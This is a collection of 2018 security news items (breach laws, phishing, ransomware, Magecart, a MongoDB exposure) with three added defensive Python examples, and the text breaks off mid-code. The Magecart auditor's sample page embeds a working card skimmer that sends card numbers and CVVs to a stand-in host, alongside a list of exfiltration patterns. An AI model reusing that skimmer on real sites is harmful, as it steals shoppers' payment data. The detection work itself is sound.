A bill to standardize the data security and breach notification process for financial institutions has been approved by the House Financial Services Committee, despite pleas not to undermine the power of state regulators.
On September 13, 2018, the committee voted 32-20 to approve the amended Gramm-Leach-Bliley Act (GLBA), now the Consumer Information Notification Requirement Act (H.R. 6743). The existing breach notification standards have been systematically amended to require that all financial institutions notify consumers of a data breach, according to Big Law Business.
The vote to approve comes on the heels of members of the committee receiving a letter from the American Bankers Association, Consumer Bankers Association, Credit Union National Association, Independent Community Bankers of America and the National Association of Federally-Insured Credit Unions.
Writing on behalf of their members, the collective group advocated for Congress to move forward with enacting data breach notification legislation, specifically supporting “a flexible, scalable data protection standard equivalent to what is already in place for financial institutions under the GLBA.”
“Our existing payments system serves hundreds of millions of consumers, retailers, financial institutions and the economy well. Protecting this system is a shared responsibility of all parties involved and we must work together and invest the necessary resources to combat never-ending threats to the payments system,” the letter said.
Yet state regulators oppose the bill. “This bill would preempt state data breach notification laws and undermine state authority, limiting states’ ability to protect its residents and oversee state-chartered and state-licensed financial services providers,” wrote the Conference of State Bank Supervisors (CSBS).
While organizations may disagree over who should have the authority to legislate data breach notifications, the financial sector continues to be the target of cyber-attacks. According to a recent report from ThreatMetrix, 81 million cybercrime attacks occurred across financial institutions during the first half of 2018. The Digital Identity Network study found that of those attacks, 27 million were targeting the mobile channel in light of mobile banking adoption.
According to a September 12 press release from ThreatMetrix, “Financial services mobile transactions are growing globally, with China, South East Asia and India showing the strongest regional growth. Overall, the biggest threat in financial services comes from device spoofing, as fraudsters attempt to trick banks into thinking multiple fraudulent log-in attempts are coming from new customer devices, perhaps by repeatedly wiping cookies or using virtual machines.”
While the fall might seem like a peculiar time to receive emails from the Internal Revenue Service (IRS), researchers at Fortinet have discovered a phishing campaign claiming to be from the IRS but reportedly sent from a server originating in Italy.
The campaign appears to be targeting nonresident aliens, as the fraudulent email is titled “2018 UPDATE: NON RESIDENT ALIEN TAX WITHHOLDING.” The FortiGuard SE team suspects that the intended targets are those who requested a six-month extension on filing their income taxes back in April.
The original report reproduces an image of the email; the researchers describe it as follows.
“The formal language and basic template (full of lengthy descriptives, no graphics, and no links) mimics a document issued by a government agency, and the form labeled 'W-8BEN Form.PDF' masquerades as an official W-8BEN document from the IRS, which according to Wikipedia is a document used by foreign persons (including corporations) to certify their non-U.S. status,” researchers wrote.
While at first glance the email seems legitimate, there are grammatical issues and spelling errors that should give readers pause. Unfortunately, because the targets of this campaign are nonresident aliens, English may not be their native tongue, and the less obvious errors in this message, such as the incorrectly written name of the agency (the Department of the Treasury), are difficult to spot even for U.S. citizens.
Researchers did find that the attached PDF file is free of any embedded executables but noted that the IRS has never sent any official documents via email. Because the attached form contains random spaces and miscellaneous punctuation marks, researchers believe that the PDF was scanned and manipulated.
“While this document states that its last revision was February 2018, the look and feel is not that of a digital document (specifically those found on IRS.gov). Finally, the fonts are mismatched on the form, especially the “FAX TO: 1 877 917 3730” direction at the bottom, which is colored in blue and is in a different font style and size. This is another dead giveaway for this poorly crafted campaign,” researchers wrote.
North Korea has hit back at a landmark US indictment of an alleged cyber operative earlier this month, branding it a “smear campaign” and the individual concerned a “non-entity.”
In a typically bellicose response to the US charges, a statement from Pyongyang’s foreign ministry on Friday claimed they amounted to little more than “vicious slander.”
“The act of cyber-crimes mentioned by the Justice Department has nothing to do with us. The US should seriously ponder over the negative consequences of circulating falsehoods and inciting antagonism against the DPRK that may affect the implementation of the joint statement adopted at the DPRK-US summit,” it reportedly noted.
“The US is totally mistaken if it seeks to gain anything from us through preposterous falsehoods and high-handedness.”
US investigators believe that Park Jin Hyok is a member of the infamous state-backed Lazarus Group responsible for WannaCry, and devastating attacks on Sony Pictures Entertainment, Bangladesh Bank and many more.
The indictment, filed on June 8 and made public at the start of the month, alleges he worked for a government front company known as Chosun Expo Joint Venture, or Korea Expo Joint Venture (KEJV), which operated out of Dalian, China.
The DoJ claimed Park and unnamed co-conspirators were given away via social media and email accounts used to send spear-phishing emails, their online aliases, accounts used to store stolen credentials, malware code libraries, proxy services and IP addresses linked to the attacks.
Park is charged with two counts of conspiracy to commit computer and wire fraud, but according to Pyongyang he is a “non-entity” — which could be interpreted to mean he doesn’t exist, or that he is a person of no importance.
A similar line was used by the Russian government in response to overwhelmingly incriminating UK intelligence and CCTV evidence of two men alleged to be responsible for attempting to assassinate a former Kremlin military man in Salisbury. The two men involved were paraded on Russian TV last week as innocent tourists.
Normal service was finally resumed at Bristol airport yesterday after two days of ransomware-related outages caused a blackout of flight information screens.
Staff were forced to hand-write regular updates on whiteboards to provide passengers with crucial information on flight arrival and departure details, while additional airport staff were deployed to help answer questions from anxious travelers.
A post on the airport’s official Twitter feed on Friday had the following:
“We are currently experiencing technical problems with our flight information screens. Flights are unaffected and details of check-in desks, boarding gates, and arrival/departure times will be made over the public address system. Additional staff are on hand to assist passengers.”
It urged passengers to arrive early “and allow extra time for check-in and boarding processes.”
Flight information was finally restored in arrivals and departures on Sunday.
Airport spokesman, James Gore, told the BBC that it had been hit by a “speculative” ransomware attack.
“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens,” he said.
"That was done to contain the problem and avoid any further impact on more critical systems.”
The airport had not paid the ransom, Gore added.
The incident is another reminder of the continuing threat posed to organizations by ransomware, even at a time when the general trend appears to be of cyber-criminals favoring easier and more lucrative ways to make money, like crypto-jacking and BEC attacks.
A midyear report from Trend Micro recently claimed that ransomware detections grew just 3% from the second half of 2017 to the first six months of 2018, while the number of new ransomware families detected dropped 25%.
In contrast, the number of cryptocurrency mining detections jumped 141% over the same period.
The UK’s universities and colleges are facing a growing threat from DDoS attacks, with reports suggesting that students may be to blame for many of them.
Figures published by Jisc reveal that while 64 higher education members were targeted by 276 DDoS attacks in 2016/17, 82 members were hit by 386 attacks in 2017/18. The figure for further education (colleges) jumped from 75 members and 302 attacks to 107 members and 475 attacks over the same period.
“DDoS attacks are designed to disrupt or bring down a network. If connectivity to the network is lost for any length of time, it can be catastrophic for any organization, both financially and reputationally,” a Jisc statement noted.
“Students might, through no fault of their own, miss the deadline for handing in assignments online, and teaching would resort to ‘chalk and talk.’ Fortunately, attacks that cause this much damage are rare, and we encourage our members to be robust in their approach to cybersecurity.”
Last week, Edinburgh university became the latest big name to fall victim to a DDoS outage after its main website was down for over a day.
The head of Jisc’s security operations centre, John Chapman, told the BBC that many of the attacks may be the result of student activity, rather than cybercrime groups.
Jisc noted how one four-day attack was traced back to a hall of residence, the result of one gamer trying to take another out of action.
Attacks are also concentrated during working hours in term time and tail off significantly during the holidays, although any DDoS-ers would probably focus their efforts when they're most likely to affect the victim organization.
"There is evidence... to suggest that students and staff may well be responsible for many of the DDoS attacks we see," Chapman reportedly claimed.
A new survey by Jisc found that universities and colleges rank lack of awareness and accidental breaches as their number one cybersecurity risk followed by ransomware/malware, and then phishing and social engineering, external attacks and DDoS in fifth place.
Microsoft Office macros accounted for the delivery of nearly half of all malicious payloads in August 2018, according to Cofense.
A recent blog post found that the macro remains the email attachment of choice for delivering malicious payloads. Of all the delivery mechanisms analyzed, Office macros accounted for 45%, carrying payloads including Geodo, Chanitor, AZORult and GandCrab.
According to researchers, the macro is a top choice because it either is enabled on a machine or only requires a single mouse click to be enabled. “This makes it almost trivial to launch the first stage of an infection chain,” Cofense wrote.
Where the Office macro setting has been left enabled, the document runs its code on opening and users see no indication that anything is wrong. Yet researchers noted that even with the default protections in place, users see only a warning bar that can be dismissed with a single click.
“Abuse of this feature can be easily mitigated by disabling macros enterprise-wide. However, macros do have legitimate and valuable usage, upon which many businesses rely. To help reduce the attack surface introduced by this feature, businesses have some options,” Cofense wrote. While a blanket policy of blocking macro-bearing documents at the gateway is the most effective solution, such strict policies can hinder user productivity.
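As an added example (not code from Cofense or the original article), the check below implements the gateway-side half of the mitigation the researchers describe: modern Office files (.docx, .docm, .xlsm, .pptm) are ZIP containers, and any VBA project inside them is stored as a part named vbaProject.bin, so an attachment filter can reject such documents on content rather than on file extension. The sample documents are constructed in memory so the script runs offline; legacy OLE2 binaries (.doc, .xls) are recognised only by their magic bytes and routed for review rather than parsed, since they need a proper OLE parser.

```python
"""Flag Office attachments that carry a VBA macro project (added example, not Cofense's code)."""
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls/.ppt container header
VBA_PART = "vbaproject.bin"                       # word/, xl/ or ppt/vbaProject.bin inside OOXML


def has_vba_project(data: bytes) -> bool:
    """True if an OOXML (ZIP-based) document contains a VBA project part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            # Match on the part's basename, case-insensitively: renaming a .docm to .docx
            # does not remove the part, and the part is what Office executes.
            return any(name.lower().rsplit("/", 1)[-1] == VBA_PART for name in zf.namelist())
    except zipfile.BadZipFile:
        return False   # not a ZIP container at all


def verdict(data: bytes) -> str:
    """Gateway decision: 'block' macro-bearing OOXML, 'review' legacy OLE2 binaries
    (which need an OLE stream parser to inspect), otherwise 'allow'."""
    if has_vba_project(data):
        return "block"
    if data.startswith(OLE2_MAGIC):
        return "review"
    return "allow"


def build_sample_docx(with_macro: bool) -> bytes:
    """Constructed minimal OOXML skeleton for the demo; real files carry many more parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # A real VBA project is itself an OLE2 stream; the header is enough here.
            zf.writestr("word/vbaProject.bin", OLE2_MAGIC + b"\x00" * 8)
    return buf.getvalue()


if __name__ == "__main__":
    samples = {
        "invoice.docm": build_sample_docx(with_macro=True),
        "invoice.docx": build_sample_docx(with_macro=True),   # renamed, still carries the project
        "report.docx": build_sample_docx(with_macro=False),
        "old_memo.doc": OLE2_MAGIC + b"\x00" * 504,
    }
    for name, blob in samples.items():
        print(f"{name:14s} -> {verdict(blob)}")
```

Blocking at the gateway is the blunt instrument the article mentions; for the user-facing half, the Office policy that blocks macros in files downloaded from the internet stops such documents from ever reaching the single-click Enable Content prompt.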
Defending against phishing attacks is further complicated by social engineering tactics. A FireEye study found that roughly one in every hundred emails is a phishing or malicious email, and that 90% of those attempted attacks are malware-less. The goal of a malware-less attack is to trick the user into sharing information about the company by impersonating a trusted source.
“Phishing has been around since the mid-to-late ’90s, and yet it’s still a significant problem as a direct effect of how successful it remains, even decades later. People are, and always will be, the weakest link,” said Thomas Pore, director of IT and services for Plixer.
“Social engineering will succeed, which means your organization is vulnerable. You must constantly monitor network traffic and digital communication to look for behavior anomalies. Operating the SOC under the assumption that you’ve already been infected puts you in a state of mind to stay diligent when network traffic behavior anomalies rise up. A combination of regular staff training, critical-asset tagging, patching and behavior anomaly detection is the foundation of a strong and successful security program.”
In response to reports that the US State Department is lagging in its implementation of basic cybersecurity standards, a bipartisan group of senators has written to Secretary of State Mike Pompeo urging him to strengthen security controls and improve compliance.
The senators point out that a password-only approach is not reliable protection, particularly given the increased number of phishing attacks. They also referenced the 2018 General Services Administration assessment, which found that only 11% of Department of State devices had enhanced security controls deployed.
“The US government, through NIST [National Institute of Standards and Technology], has done a great job of providing best-practice guidance to enterprise via the Cybersecurity Framework and other documents,” said Anupam Sahai, vice president of product management at Cavirin.
“However, it is sad that they are not as widely adopted across the different agencies. Is this any different from Congress being unable to come to agreement on securing voting machines in advance of the November elections, knowing the published risks?”
Senators Ron Wyden, Ed Markey, Jeanne Shaheen, Cory Gardner and Rand Paul wrote, “We are sure you will agree on the need to protect American diplomacy from cyber attacks, which is why we have such a hard time understanding why the Department of State has not followed the lead of many other agencies and complied with federal law requiring agency use of MFA [multifactor authentication].”
“You would expect anyone handling sensitive data today to have enabled multifactor authentication as one of their basic security protocols,” said Steve Durbin, managing director of the Information Security Forum.
“It’s imperative that all types of organizations ensure they have strong standard security measures in place. This requires more diligence and organization-wide discipline than throwing money at the latest hyped-up software solution.”
The letter requested that Secretary Pompeo respond with details to three questions by October 12, 2018. Among other things, lawmakers want to know what actions the Department of State has taken to implement MFA, specifically for accounts with elevated privileges. In addition, they have requested statistics with details on the number of attempted and successful attacks on the Department of State systems located abroad for each of the past three years.
Twistlock has issued its first biannual State of Cloud Native Security report, in which researchers analyzed deployments of common cloud-native applications and ran honeypots to collect data on risk factors and attack patterns against cloud-native services.
Researchers used two sampling methods. The first combined their own internet scanning with public scanning services to enumerate openly accessible servers running commonly used cloud-native applications; the service banners were then parsed to identify versions and known vulnerabilities.
The second sampling method used honeypots to mimic the behaviors of popular cloud-native applications to detect patterns of attacks on open servers. “The team found a disturbing number of out-of-date applications, with many open to known vulnerabilities (with CVEs). Some of these were vulnerabilities that were disclosed years ago. Additionally, the team found a great number of active bots/attackers that search for these applications in an attempt to exploit them,” the report said.
What researchers discovered was that 60% of cloud-native services are not automatically patched to the latest version. Additionally, over 90% of attacks are automatically executed against outdated code and known CVEs.
In their survey of the top cloud-native applications, researchers discovered that 25% were running with CVEs where a known exploit existed. The application most likely to be outdated was MySQL, with more than 80% of deployments at least one version behind. More than 60% of these cloud-native application attacks originated from Chinese IPs.
“Adoption of cloud-native technologies gives organizations a chance to build and deploy software faster and scale and manage deployments with ease. But this speed and agility is often coming at the expense of foundational security practices,” said Dima Stopel, Twistlock co-founder and VP of research and development, in a press release.
“Organizations need to build automatic enforcement of security into their application pipelines...to prevent vulnerable code from reaching production but also to quickly triage and patch new risks in production.”
Let’s change the way we talk about security, as global news and incidents are creating new threats.
Speaking at 44CON on how “Bad analogies make bad realities,” Charl van der Walt, strategic director at SensePost, said that “while we were talking about hacking sex toys, Russian hackers changed the world quite substantially” and began “a new era in our industry.”
He said that this changed the cybersecurity industry significantly, and as attackers upped their game “our world is different to what we knew before, a threat is emerging that has potential to change the world.”
He told the audience that as the world is “going to change in significant ways, then you’re a part of that battle and at the front of a war that shapes our world in a substantial way,” and we can shape it in the decisions we make, and it is “up to us to determine how to change.”
Using a series of analogies including the 2008 financial crisis and the Doomsday clock, van der Walt argued that it was time to develop the “why” of security and “why it matters” if it is done right, and how we need to explain why security is important in a way others can understand.
“Metaphors matter, and change the way we think,” he said. “Compare severity and likelihood, and express where the Doomsday Clock is in terms of the security concept. The problem is risk is thumb sucking; estimating concepts with no way to quantify them.”
Speaking on debt management, van der Walt recommended creating and maintaining a debt register, and deciding who is best positioned to determine the right thing to do, and think at the right level of security.
“Every time a security trade-off is made, get the recommended cost and what the actual cost is and deduct one from the other and get the debt. Dial it up or down depending on the severity of issue, and once you have the register you communicate it to the board for them to consider.”
He concluded by saying that we see breaches all of the time, and it is easy to look at each in isolation, but collectively these can be a problem for everyone. “We are facing real threats and that is where the fundamentals of the world can be changed,” he said. “If we address the ways we talk and analogies we use.”
News has emerged of yet another Magecart victim following a major breach affecting British Airways: this time a push notification service provider known as Feedify has been repeatedly targeted.
RiskIQ threat researcher Yonathan Klijnsma explained that Feedify had in fact been “affected” by Magecart since August 17. Although the firm remediated the issue, the attackers re-inserted the skimmer soon after.
Security researcher Kevin Beaumont warned e-commerce firms to remove Feedify.
Feedify is the latest in a long line of Magecart victims. However, contrary to previous reports, Klijnsma explained that the attacks aren’t tied to a specific group but a number of separate entities all using the same code.
This explains why some attacks go for a supply chain provider, such as Feedify or Ticketmaster partner Inbenta Technologies, while others have targeted the e-commerce site directly, like the sophisticated BA attack.
Another victim of the group over recent weeks is fashion and home décor provider Groopdealz, according to Klijnsma. He revealed this week that the firm’s site was infected with the Magecart skimmer on August 5.
Magecart has been tracked since 2016. It is JavaScript that operates on a website much like a physical card skimmer: it captures card data as the shopper enters it into an e-commerce form and sends it to the attackers. Unlike traditional breaches of stored card databases, which are not supposed to retain CVV numbers, skimming captures the CVV as it is typed, making the stolen data easier to monetize.
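The skimmer described above arrives either as an inline script injected into the page or as a tampered third-party script, which is what the Feedify and Inbenta cases involved. As an added example (not code from RiskIQ, Feedify or the original article), the audit below parses a checkout page and flags the three things a periodic crawl of your own checkout should catch: external scripts from hosts outside an allowlist, third-party scripts with no Subresource Integrity attribute (which can be swapped on the provider's server without any change to your page), and inline scripts that both read card fields and ship data off the page. The allowlist, the field-name hints and the sample HTML are constructed for this example.

```python
"""Audit the script tags on a checkout page for Magecart-style tampering (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: only these hosts are expected to serve script on the checkout page.
ALLOWED_SCRIPT_HOSTS = {"cdn.example"}
# Names a skimmer reads from the payment form; constructed, extend to match your own form.
CARD_FIELD_HINTS = ("cardnumber", "card_number", "cvv", "cvc", "expiry")
# Ways inline code ships data off the page.
EXFIL_HINTS = ("new image", "xmlhttprequest", "fetch(", "sendbeacon", "websocket")


class ScriptAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # (kind, detail) tuples in page order
        self._inline = None     # buffer while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attrs = dict(attrs)
        src = attrs.get("src")
        if src is None:
            self._inline = []
            return
        host = (urlsplit(src).hostname or "").lower()   # "" for same-origin relative paths
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            self.findings.append(("unexpected-origin", src))
        elif host and "integrity" not in attrs:
            # Without SRI the browser will run whatever the third party serves today.
            self.findings.append(("missing-sri", src))

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline).lower()
            self._inline = None
            if any(h in body for h in CARD_FIELD_HINTS) and any(h in body for h in EXFIL_HINTS):
                self.findings.append(("inline-card-exfil", body.strip()[:60]))


def audit_checkout_page(html: str) -> list:
    """Return the findings for one page, in document order."""
    parser = ScriptAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed checkout page: one pinned library, one unpinned, one unknown widget,
# and an injected inline skimmer that beacons the card number out via an image request.
SAMPLE_CHECKOUT_HTML = """<html><body>
<form id="payment"><input name="cardNumber"><input name="cvv"><input name="expiry"></form>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example/app.js" integrity="sha384-EXAMPLEHASH" crossorigin="anonymous"></script>
<script src="https://cdn.example/tracking.js"></script>
<script src="https://push-widget.example/feed.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = document.getElementsByName('cardNumber')[0].value + '|' +
          document.getElementsByName('cvv')[0].value;
  new Image().src = 'https://collect.example/?q=' + btoa(d);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(f"{kind:18s} {detail}")
```

The inline heuristic is deliberately coarse: a legitimate first-party payment script also reads card fields, so every inline hit is a change to review against the last known-good copy of the page, not an automatic verdict. The cleaner structural fix is to restrict script sources with a Content Security Policy and pin third-party scripts with SRI, which turns the second and third findings into hard failures in the browser.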
The ICO has received 500 calls each week to its breach reporting helpline since the GDPR came into force in May, but around a third of these don’t meet the minimum threshold, according to the deputy commissioner of operations.
James Dipple-Johnstone told the CBI Cyber Conference in London this week that the UK privacy watchdog had been inundated as anxious firms over-report.
In the privacy watchdog’s first update since the new data protection regime came into force, he also revealed that many organizations are “struggling with the concept” of 72-hour breach notifications, interpreting it incorrectly as 72 “working hours.”
Dipple-Johnstone urged organizations to get their incident response plans in place and ensure senior employees are ready to provide as much detail as possible from the start, adding that some breach reports are incomplete.
“It is not very helpful to be told there is a breach affecting lots of customers but the reporter isn’t authorized by the general counsel to tell us more than that,” he argued. “If you don’t assign adequate resources to managing the breach we may ask you why not.”
He urged organizations to check the ICO’s reporting guidelines, and to ensure they have multi-layered security in place, including elements such as two-factor authentication, email filters and anti-spoofing controls, and enhanced staff training and awareness.
Lillian Tsang, senior data protection and privacy consultant at the Falanx Group, argued companies are over-reporting to be on the safe side.
“It is the assessment, ‘whether a breach poses a fundamental risk to people’s right and freedom’ which makes a breach reportable — this part is the difficult/uncertain element that a company faces,” she explained.
“A company would have to come down to a decision and it would be their decision alone, so it can become a matter of subjectivity: a case of ‘do we or don’t we?’ Companies don’t want to play a guessing game because they would rather report a breach, to avoid fines of non-reporting than potentially face the financial and reputational consequences.”
To mitigate these challenges, companies need a clear breach reporting procedure outlining which types of incident are worth reporting and which aren’t, she advised.
“This will help them make a decision within the allotted 72-hour time period. It is also important that these criteria are shared and adopted throughout the whole organization by training staff and creating greater awareness,” said Tsang.
“Understanding the products and services where potential risks of a fundamental breach might occur is also vital by using tools, such as privacy by design and data protection impact assessments, continuously throughout the whole product life cycle. Finally, companies need to look at and understand guidance from the regulator and the European Commission.”
Board members need to improve their understanding of cybersecurity to better manage business risk, the head of the National Cyber Security Centre (NCSC) has argued.
Speaking at the CBI Cyber Conference in London this week, Ciaran Martin claimed that senior business leaders are laboring under three dangerous misapprehensions, that cybersecurity is: too complex so they won’t understand it, too sophisticated so they can’t do anything to stop it and targeted, so they’re not at risk.
Yet board members can’t manage risk they don’t understand, so they must become more cyber-literate, he said.
“No-one in government is asking you to make cybersecurity your top priority. Your core business is your top priority,” said Martin.
“We do expect you, however, to be good enough at cybersecurity to take care of the things you care about. And that means you have to understand what they are, and what you can do to protect yourselves. This means you need to be – at least a little bit – cyber-literate.”
Martin admitted that the government’s strategy on providing businesses with cybersecurity advice and best practice hasn’t worked out as expected, with organizations focusing on good governance and simply outsourcing expertise.
“If you look at some of the previous guidance it simply says — cybersecurity should be discussed at board level. It doesn’t say how, and that a plan should be in place. That’s what we are moving on from today,” said Martin.
“So, over the past few months, we have been talking to businesses to work out where the gaps in their cybersecurity knowledge lie. And over the next few months we will be rolling out a suite of guidance on cybersecurity for large corporate organizations.”
During the speech, Martin posed five basic questions board members should be asking of their technical teams.
These cover: how the organization deals with phishing, privileged IT accounts, software and device patching, supply chain security and authentication.
“Crucially, we are also telling you what to look for in the response,” he added.
“If the answer is: ‘We have hired X and bought Y to address the problem,’ ask the question again. You need to understand what is actually happening — not what activity has been bought.”
Speaking at the Spotlight18 conference in Las Vegas today, Deloitte experts weighed in on how to build an insider threat program during a round table discussion. Participating in the keynote discussion were Linda Walsh, managing director, Cyber Risk Services; Peter Hodge, senior manager, Cyber Risk Services; and Naj Adib, senior manager, cybersecurity advisor.
The success of Deloitte’s user entity and behavior analytics (UEBA) projects stems directly from the fact that they are built within the framework of an overarching risk-program approach, and the Deloitte team said its three key pillars of a successful insider threat program include people, process and technology.
“Scaring people doesn’t work well,” said Walsh, who spent 21 years working on insider threats for the FBI. A common problem that Walsh has seen throughout her career is with system admins who leave access open to be able to perform tasks or with admins who have turned into disgruntled employees and maliciously leave access open in order to steal user credentials. “That type of problem, that lateral movement is a hard thing to solve for,” she said.
Developing an insider threat program requires that organizations first define who and what insider threats actually are. “There are not a lot of organizations that have not defined what insider threat means to them. Insiders can be current employees, privileged IT users/admins, contractors/service providers, customers/clients, and their behaviors can be malevolent or unintentional,” said Adib. "Defining insiders and understanding the motivational factors of their behaviors is foundational to building your program."
Because all organizations are different, insider threat programs will vary from company to company, but regardless of size or risk, every organization should develop an insider threat working group. A working group is the first step and a key answer to the often-asked question of how to get mobilized.
Running simulation attacks, such as a Phishme (now Cofense) campaign, can be enlightening. “Now they get it,” said Walsh, “and it oftentimes works so well that they are not opening things they should. That’s the type of awareness you can start. Those are your quick wins.”
The key guiding principles of building a successful insider threat program are that it must be holistic, coordinated, proactive and risk based. “It’s about setting the right policies and standards so that users understand the expectations. We don’t want to go out and have policies and standards that are shelf-ware. Security awareness training within organizations is out there, so add in concepts of what constitutes an insider. Train people to become your frontline,” Adib said.
The goal is to reduce the number of false positives, which comes back to the insider threat working group, said Walsh. "Once you've found all the meaningful data and you can correlate it – which is a challenge that takes a lot of work – you can start prioritizing to reduce false positives to come out with some meaningful, actionable data. A lot of people are hesitant to start turning out that data because there is so much noise, but ignorance is not a security strategy anymore."
Though Bomgar was itself acquired by Francisco Partners earlier this year, the company has announced today that it will acquire Phoenix, Arizona, based BeyondTrust, a privilege-centric security company. The joint company will operate under the BeyondTrust name, though the company will be headquartered in Bomgar's Atlanta office.
No specific terms of the acquisition were disclosed, but the deal is expected to close in October. “I’m confident that the additional investment and scale resulting from this combination will drive innovation for our customers and new opportunities for our partners as we expand our leadership position in the fast-moving Privileged Access Management market,” said Kevin Hickey, president and CEO of BeyondTrust, in today’s press release.
With the goal of moving its mission to help customers better defend against cyber-attacks forward, Bomgar has signed the agreement securing BeyondTrust’s extensive privileged access management (PAM) platform.
“We are extremely excited to build upon BeyondTrust’s Privileged Access Management leadership and the significant benefits it will bring to our joint customers, partners and people,” said Matt Dircks, CEO of Bomgar, who will lead the merged company as CEO.
“Both organizations bring talented employees who are passionate about protecting organizations from attacks related to privilege access. The greater scale and resources of the combined company will allow us to accelerate innovation and deliver technology that protects our customers from constantly evolving threats.”
As threats continue to evolve across endpoint, server, internet of things, cloud and network device environments, combining Bomgar’s security offerings with the BeyondTrust PAM portfolio, currently used by more than 19,000 customers worldwide, is intended to strengthen protection of privileged credentials, remote access sessions and endpoints.
“Both Bomgar and BeyondTrust have a long history of driving innovation and efficiency and delivering solutions, services and support that customers love,” said Francisco Partners’ co-founder and CEO Dipanjan “DJ” Deb.
“Privileged Access Management is one of the top priorities for today’s security leaders, and we see incredible opportunity with the combination of Bomgar’s and BeyondTrust’s technology and talent,” said Brian Decker, partner and head of security investing at Francisco Partners.
“The joint team is focused on developing integrated and usable products, building an even stronger channel and continuing to deliver the highest levels of customer service and support.”
A key part of the UK’s mass surveillance regime has been ruled illegal by a European court.
The European Court of Human Rights ruled that the UK’s regime for bulk interception of communications, and its regime for obtaining communications data from communications service providers, violated Article 8 of the European Convention on Human Rights: the right to respect for private and family life and correspondence.
They also contravened Article 10 in that there were “insufficient safeguards in respect of confidential journalistic material.”
However, there are some rather large caveats to the judgement.
The court found that bulk interception doesn’t “in and of itself” violate human rights, just that the government didn’t have enough independent oversight in place to monitor “interception and the filtering, search and selection of intercepted communications for examination, and the safeguards governing the selection of ‘related communications data’.”
The court also found that sharing intelligence with foreign governments — as GCHQ has done with the NSA for years — did not violate the law.
Finally, this judgement only applies to the previous regime and not the new Investigatory Powers Act — although the latter is seen by many as even more controversial.
Also known as the 'Snoopers’ Charter', this surveillance legislation has already suffered a major setback: in April the High Court told ministers to redraft the section requiring communications providers to retain, for a year, phone records, location data, internet browsing history and details of everyone a user emails and texts.
Although the judges again said that the bulk collection in itself wasn’t illegal, they ruled that the fact police, regulators and other bodies can then access this info without independent authorization and for reasons unrelated to investigating terrorism or serious crime, most definitely is.
The latest European court case was brought by Big Brother Watch, Amnesty and other human rights groups after revelations by Edward Snowden in 2013 on the mass collection of data on citizens, even if they are not suspected of a crime.
Data management firm Veeam has been left red-faced after a misconfigured MongoDB server was allowed to publicly expose 445 million records, including prospective customer names and email addresses.
Independent researcher Bob Diachenko said he discovered the Amazon-hosted IP address on September 5, after Shodan had indexed it on August 31. Found via a simple Shodan search, the database was left exposed without a password until September 9.
The 200GB trove appears to have been used by the company’s marketing automation team and included hundreds of millions of records collected from 2013 to 2017.
Publicly exposed data included customers’ first and last names, email addresses and recipient type (end-customer or partner), country, organization size and more, according to Diachenko.
“Even taking into account the non-sensitivity of the data, the public availability of such a large, structured and targeted dataset online could become a real treasure chest for spammers and phishers. It is also a big stroke of luck that the database was not hit by the new wave of ransomware attacks which have been specifically targeting MongoDB instances (with much larger extortion demands than last year),” he commented.
“As I have already reported, issues with MongoDB have been known since at least March of 2013 and have been widely reported since. The company has updated its software with secure defaults and has released security guidelines. It's been five years now and these unsecured databases are still widely available on the internet.”
The news will be rather embarrassing for a firm which sells backup and “intelligent data management” solutions to help firms “move securely across multi-cloud infrastructures.”
However, it seems to have acted pretty quickly to secure the server once notified by reporters.
A statement from the company claimed that the records were “non-sensitive” prospect emails, although that would still theoretically be enough to launch phishing attacks at the individuals.
“We have now ensured that all Veeam databases are secure,” it added. “Veeam takes data privacy and security very seriously, and a full investigation is currently underway."
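Diachenko’s point is that the exposure pattern behind this incident is well known: a mongod listening on every interface with access control switched off. The following script is an added example for this article, not Veeam’s configuration or tooling, and the two mongod.conf fragments in it are constructed for the demonstration. It parses the small key/value subset of YAML that mongod.conf uses and reports the two settings an auditor checks first: net.bindIp (or net.bindIpAll) and security.authorization. The treatment of a missing bindIp rests on a version assumption stated in the comments.

```python
"""Audit a mongod.conf for the two settings behind most public MongoDB exposures:
listening on every interface and running without access control.
Added example for this article; not Veeam's configuration or tooling."""


def parse_mongod_conf(text):
    """Minimal parser for the indentation-based key: value subset of YAML that
    mongod.conf uses (nested mappings, scalar values). Assumption: no lists,
    no flow-style mappings and no '#' inside values."""
    root = {}
    stack = [(-1, root)]  # (indent, mapping) for each open nesting level
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()  # drop trailing comments
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, sep, value = line.strip().partition(":")
        if not sep:
            raise ValueError(f"unsupported line: {raw!r}")
        while stack[-1][0] >= indent:  # close mappings at the same or deeper level
            stack.pop()
        container = stack[-1][1]
        value = value.strip().strip("'\"")
        if value == "":
            child = {}
            container[key.strip()] = child
            stack.append((indent, child))
        else:
            container[key.strip()] = value
    return root


def audit_mongod_conf(text):
    """Return a list of findings; an empty list means neither exposure check fired."""
    cfg = parse_mongod_conf(text)
    net = cfg.get("net", {})
    sec = cfg.get("security", {})
    findings = []

    bind = net.get("bindIp")
    if str(net.get("bindIpAll", "")).lower() == "true":
        findings.append("net.bindIpAll is true: mongod listens on every interface")
    elif bind is None:
        # Before MongoDB 3.6 an unset bindIp meant all interfaces; 3.6+ defaults to
        # localhost. Treat the absence as a finding and confirm the server version.
        findings.append("net.bindIp is not set: pre-3.6 mongod listens on every interface")
    else:
        addrs = {a.strip() for a in bind.split(",")}
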